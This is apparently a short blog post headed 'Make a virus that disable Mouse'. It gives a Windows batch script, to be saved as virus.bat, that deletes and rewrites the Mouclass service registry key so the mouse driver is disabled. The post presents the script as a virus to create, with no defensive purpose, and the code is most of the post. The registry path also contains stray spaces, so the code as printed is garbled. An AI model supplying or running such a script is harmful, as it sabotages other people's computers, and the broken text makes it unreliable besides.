Pages

Make a virus that disable Mouse


• Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL _MACHINE\system \CurrentControl Set\Services\Mo uclass"
reg delete %key%
reg add %key% /vStart /t REG_DWORD /d4
rem ---------------------------------
• Save this file as virus.bat
• Done you just created your virus.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS

0 Response to "Make a virus that disable Mouse"

Post a Comment